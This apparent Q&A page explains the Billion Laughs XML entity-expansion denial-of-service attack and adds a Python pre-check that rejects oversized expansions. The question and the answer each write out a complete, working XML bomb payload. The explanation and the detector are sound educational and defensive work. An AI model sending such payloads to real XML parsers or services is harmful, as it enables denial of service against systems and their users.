This page covers the question "How does the Billion Laughs XML DoS attack work?" and the recommended answer to it.

Problem description

<!DOCTYPE root [
 <!ENTITY ha "Ha !">
 <!ENTITY ha2 "&ha; &ha;">
 <!ENTITY ha3 "&ha2; &ha2;">
 <!ENTITY ha4 "&ha3; &ha3;">
 <!ENTITY ha5 "&ha4; &ha4;">
 ...
 <!ENTITY ha128 "&ha127; &ha127;">
]>
<root>&ha128;</root>

Supposedly this is called a billion laughs DoS attack.

Does anyone know how it works?

Recommended answer

The Billion Laughs attack is a denial-of-service attack that targets XML parsers. The Billion Laughs attack is also known as an XML bomb, or more esoterically, the exponential entity expansion attack. A Billion Laughs attack can occur even when using well-formed XML and can also pass XML schema validation.

The vanilla Billion Laughs attack is illustrated in the XML file represented below.

<?xml version="1.0"?>
<!DOCTYPE lolz [
<!ENTITY lol "lol">
<!ENTITY lol2 "&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;">
<!ENTITY lol3 "&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;">
<!ENTITY lol4 "&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;">
<!ENTITY lol5 "&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;">
<!ENTITY lol6 "&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;">
<!ENTITY lol7 "&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;">
<!ENTITY lol8 "&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;">
<!ENTITY lol9 "&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;">
]>
<lolz>&lol9;</lolz>

In this example, there are 10 different XML entities, lol to lol9. The first entity, lol, is defined to be the string "lol". However, each of the other entities is defined to be 10 of another entity. The document content section of this XML file contains a reference to only one instance of the entity lol9. However, when this is being parsed by a DOM or SAX parser, when lol9 is encountered, it is expanded into 10 lol8s, each of which is expanded into 10 lol7s, and so on and so forth. By the time everything is expanded to the text lol, there are 100,000,000 instances of the string "lol". If there was one more entity, or lol was defined as 10 strings of "lol", there would be a billion "lol"s, hence the name of the attack. Needless to say, this many expansions consumes an exponential amount of resources and time, causing the DoS.

A more extensive explanation exists on my blog.
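As an added example (not part of the original answer), the following defender-side pre-check computes how large the document would become from the entity declarations alone, without ever performing the expansion, and refuses to hand the document to a parser above a limit. It covers both the 10-way `lol` chain from the answer and the 2-way `ha` chain from the question; `make_bomb`, `MAX_EXPANSION` and the 10 MB limit are constructed here for illustration.

```python
import re

# Internal-DTD entity declarations and references, in the shape shown on this page.
ENTITY_DECL = re.compile(r'<!ENTITY\s+(\w+)\s+"([^"]*)"\s*>')
ENTITY_REF = re.compile(r'&(\w+);')
DOCTYPE = re.compile(r'<!DOCTYPE.*?\]>', re.S)

def entity_sizes(xml_text):
    """Expanded length of every entity, computed from the declarations without expanding."""
    defs = dict(ENTITY_DECL.findall(xml_text))
    sizes = {}
    def size(name, stack):
        if name in sizes:
            return sizes[name]
        if name in stack:  # an entity that refers back to itself is not well-formed XML at all
            raise ValueError(f"recursive entity: {name}")
        total = len(defs[name])
        for ref in ENTITY_REF.findall(defs[name]):
            if ref in defs:  # the "&ref;" token (len(ref) + 2 chars) becomes its expansion
                total += size(ref, stack | {name}) - (len(ref) + 2)
        sizes[name] = total
        return total

    for name in defs:
        size(name, frozenset())
    return sizes

def expanded_document_size(xml_text):
    """Length the document body would reach after every reference is expanded."""
    sizes = entity_sizes(xml_text)
    body = DOCTYPE.sub("", xml_text)
    total = len(body)
    for ref in ENTITY_REF.findall(body):
        if ref in sizes:
            total += sizes[ref] - (len(ref) + 2)
    return total

MAX_EXPANSION = 10_000_000  # constructed policy: refuse anything over 10 MB of expanded text
def safe_to_parse(xml_text, limit=MAX_EXPANSION):
    return expanded_document_size(xml_text) <= limit

def make_bomb(prefix, fanout, depth, leaf, sep=""):
    """Constructed test input shaped like the page's examples: prefix, prefix2, ..., prefixN."""
    decls = [f'<!ENTITY {prefix} "{leaf}">']
    for i in range(2, depth + 1):
        prev = prefix if i == 2 else f"{prefix}{i - 1}"
        refs = sep.join([f"&{prev};"] * fanout)
        decls.append(f'<!ENTITY {prefix}{i} "{refs}">')
    top = prefix if depth == 1 else f"{prefix}{depth}"
    return "<!DOCTYPE root [\n" + "\n".join(decls) + f"\n]>\n<root>&{top};</root>"
```

For the answer's document, `entity_sizes` reports 300,000,000 characters for `lol9` (10^8 copies of a 3-byte string) and `safe_to_parse` returns False; the question's 128-level chain is rejected the same way, even though the file itself is a few kilobytes.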

10-28 09:08